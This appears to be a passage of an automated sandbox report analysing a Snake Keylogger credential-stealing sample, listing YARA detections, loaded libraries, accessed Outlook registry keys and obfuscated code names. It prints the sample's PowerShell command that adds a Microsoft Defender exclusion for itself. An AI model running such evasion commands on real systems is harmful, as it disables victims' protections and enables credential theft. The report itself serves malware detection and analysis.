Source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rPO2400525.exe PID: 6200, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: rPO2400525.exe PID: 2380, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: rPO2400525.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, UltraSpeed.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, COVIDPickers.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, UltraSpeed.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO2400525.exe.3650f90.4.raw.unpack, COVIDPickers.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, f4QJT9wb5LajnPRhVM.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, f4QJT9wb5LajnPRhVM.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, f4QJT9wb5LajnPRhVM.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, BQadlnmLDjHO39f8Fa.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, BQadlnmLDjHO39f8Fa.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, BQadlnmLDjHO39f8Fa.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, BQadlnmLDjHO39f8Fa.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, f4QJT9wb5LajnPRhVM.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, f4QJT9wb5LajnPRhVM.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, f4QJT9wb5LajnPRhVM.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, BQadlnmLDjHO39f8Fa.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, BQadlnmLDjHO39f8Fa.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, f4QJT9wb5LajnPRhVM.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, f4QJT9wb5LajnPRhVM.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, f4QJT9wb5LajnPRhVM.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/6@2/2
Source: C:\Users\user\Desktop\rPO2400525.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rPO2400525.exe.log
Source: C:\Users\user\Desktop\rPO2400525.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zb5losx.c4q.ps1
Source: rPO2400525.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rPO2400525.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\rPO2400525.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\rPO2400525.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: rPO2400525.exe, 00000005.00000002.3323697493.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3324874904.0000000003CFD000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002DCC000.00000004.00000800.00020000.00000000.sdmp, rPO2400525.exe, 00000005.00000002.3323697493.0000000002DED000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: rPO2400525.exe | Virustotal: Detection: 23%
Source: rPO2400525.exe | ReversingLabs: Detection: 21%
Source: unknown | Process created: C:\Users\user\Desktop\rPO2400525.exe "C:\Users\user\Desktop\rPO2400525.exe"
Source: C:\Users\user\Desktop\rPO2400525.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rPO2400525.exe | Process created: C:\Users\user\Desktop\rPO2400525.exe "C:\Users\user\Desktop\rPO2400525.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\rPO2400525.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe"
Source: C:\Users\user\Desktop\rPO2400525.exe | Process created: C:\Users\user\Desktop\rPO2400525.exe "C:\Users\user\Desktop\rPO2400525.exe"
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\rPO2400525.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\rPO2400525.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: rPO2400525.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: rPO2400525.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: rPO2400525.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, f4QJT9wb5LajnPRhVM.cs | .Net Code: QOlxKxrTC1 System.Reflection.Assembly.Load(byte[])
Source: 0.2.rPO2400525.exe.406b290.3.raw.unpack, f4QJT9wb5LajnPRhVM.cs | .Net Code: QOlxKxrTC1 System.Reflection.Assembly.Load(byte[])
Source: 0.2.rPO2400525.exe.6b00000.6.raw.unpack, f4QJT9wb5LajnPRhVM.cs | .Net Code: QOlxKxrTC1 System.Reflection.Assembly.Load(byte[])
Source: 0.2.rPO2400525.exe.5060000.5.raw.unpack, RK.cs | .Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: rPO2400525.exe | Static PE information: 0x84197646 [Sun Mar 25 04:06:30 2040 UTC]
Source: rPO2400525.exe | Static PE information: section name: .text entropy: 7.650200393910615
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, QmNxRKPlC4gn0sRcV1.cs | High entropy of concatenated method names: 'ToString', 'bw0SXNhoQ3', 'WIdSUtCdR1', 'J5eSgJ7OLU', 'TkySObnk7V', 'jJ9S1dBQob', 'T8KS5rMKYC', 'oNjSHHk2tQ', 'dURS4GcK8t', 'fGwSYVjEO0'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, FG6Wmpdx8ViBYnqLtyQ.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fBIbkIZrpZ', 'xqGbnKnJxm', 'n5tb6Q6CLd', 'AZ6bbXSAqA', 'cdtbeK5d7a', 'pRNbcAqZKk', 'vSsb3s929c'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, WGBtAgu9e8eGuUqGon.cs | High entropy of concatenated method names: 'qnANtStUlO', 'bevNIaJQEG', 'OjXGhPGQt2', 'HSLGd9HndM', 'WXsNXdeVvq', 'iHuNiNcfGm', 'mIXNCeDwJD', 'vPVNat6Q87', 'R62NrrsKVJ', 'asZNPTGkmw'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, YCrCE67WdClXvvj9dJ.cs | High entropy of concatenated method names: 'XsJVDTo1H0', 'CY9VfeWKZN', 'WXKV9rTi3M', 'kRFVQwYBIY', 'vZcVwABdQb', 'wsL9JKpfgm', 'yoj9u7jgl0', 'igk9Ls31lQ', 'TrC9t2VqNT', 'm6e92AEDw8'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, OERyRezUeySYGOwujG.cs | High entropy of concatenated method names: 'nmanAd7aKs', 'xLEnmPfYE5', 'MjenjmCDCV', 'E0Wn7RQEkB', 'XEInUnw8mC', 'u2SnOJy4nR', 'Qwdn1s8dpI', 'aG5n3pcErB', 'X1Sns7okiV', 'NvSnRj18l0'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, KLxxx4fY9da11kemkF.cs | High entropy of concatenated method names: 'Dispose', 'YU3d2eANt9', 'gdnyUga15H', 'TJbbJkH4nH', 'nCadIPBu6f', 'fUtdzAYyDQ', 'ProcessDialogKey', 'tcgyhK9F1N', 'fUYydNiLES', 'JHNyy2mHcv'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, KVRbeMHT26Q3AmdiFs.cs | High entropy of concatenated method names: 'RlsQ05ttxG', 'KncQvLDES8', 'zcrQVc0yXB', 'DiQVI7jZF5', 'rBsVzo9YqY', 'LNLQhC7jcf', 'BuGQdgHpwY', 'FuKQyOdaea', 'HGYQZ53xF8', 'CDfQx4FMp0'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, UoInSmdhbkUxcqdcNvi.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zkLnXEwfxy', 'TjlniA9AN7', 'pwOnC5aH5q', 'pSIna9yCul', 'Kltnr92Gaq', 'z1rnPXg5Ju', 'b6rnBuk86v'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, uqcWmDxK2RTnDoC0Fe.cs | High entropy of concatenated method names: 'YEWdQQadln', 'WDjdwHO39f', 'UgYdpp5dhv', 'xjtdl9imtF', 'zAodMKEICr', 'QE6dSWdClX', 'e55Lm6Brca9hMiqNsV', 'ABGDC8wsEN3q58LpWm', 'ewTddTVdRo', 'Ej8dZ0Meuy'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, IK9F1N2fUYNiLES1HN.cs | High entropy of concatenated method names: 'ravk7mODpq', 'KHJkU54ya6', 'cBZkg1dkb0', 'YyJkO6yqNI', 'IrPk144MXq', 'WWtk56kGyW', 'dJtkH6xnT0', 'wUpk4EsC18', 'xYkkYkcdKV', 'gNukEvYKWk'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, BQadlnmLDjHO39f8Fa.cs | High entropy of concatenated method names: 'pywfa0uwAZ', 'JqdfrHYAxY', 'bjQfP9PEQU', 'ukMfBUfBWO', 'PXJfJbTdZN', 'f25fukSCTd', 'BfGfLkfopa', 'jRQftUoehY', 'XSRf2fu90v', 'a79fIUqkuN'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, W5vsRJjgYp5dhv3jt9.cs | High entropy of concatenated method names: 'u43vTwLW1a', 'VAnvApJXbu', 'syOvmn6OLO', 'rnhvjFQF0x', 'oGKvMhmYp4', 'zUJvSUK5Ny', 'djIvN2bQ36', 'hVavGaNQpb', 'bC2vkkxEJH', 'TC4vnEljkr'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, fITsPGCclECbKn2Anm.cs | High entropy of concatenated method names: 'CZ4omHkYT9', 'UprojMq6kE', 'tJAo733jYW', 'XI4oUgPlEg', 'FHSoOPFsXw', 'C3Ko1KFuY7', 'NeroHaAb15', 'Y3ao4ZMxEs', 'EDboE5pSPW', 'z4eoXdT0Vi'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, PdtvdfYUwTWmPyvkVM.cs | High entropy of concatenated method names: 'up9QsuiyFG', 'k0RQRwiLDZ', 'BMVQKrMQ9W', 'tmZQTEICUg', 'fYUQWhyYLC', 'YQyQAp4alr', 'YJFQFnoNNv', 'pWJQmPrlaQ', 'PUyQj6xQiK', 'W06QqS9rFr'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, rx779KyfXyPA4V7nik.cs | High entropy of concatenated method names: 'FA3Kvrler', 'JI2TP1Zum', 'YIWA5l60Z', 'v8tFuvBNQ', 'AqIjt1GAJ', 'pYCqsITCw', 'dOfledX2RQM4EgSYv9', 'BJNnU55YwsBberRp4w', 'Yc4mI8CPL632kiWm8X', 'UiRGpON4W'
Source: 0.2.rPO2400525.exe.400f670.2.raw.unpack, t1NaILdyZBBFZU8pqRQ.cs | High entropy of concatenated method names: 'ToString', 'X836mNPCnS', 'F2W6jnqYRc', 'gRj6q3niLx', 'RKH67uSyDU', 'HXh6UywbN9', 'hXm6gGBg1k', 'GbX6OuYOGD', 'AhCLoB8M74fa2Ju7Fbw', 'J0Q0CR8sNwpa4ZCyQVW'
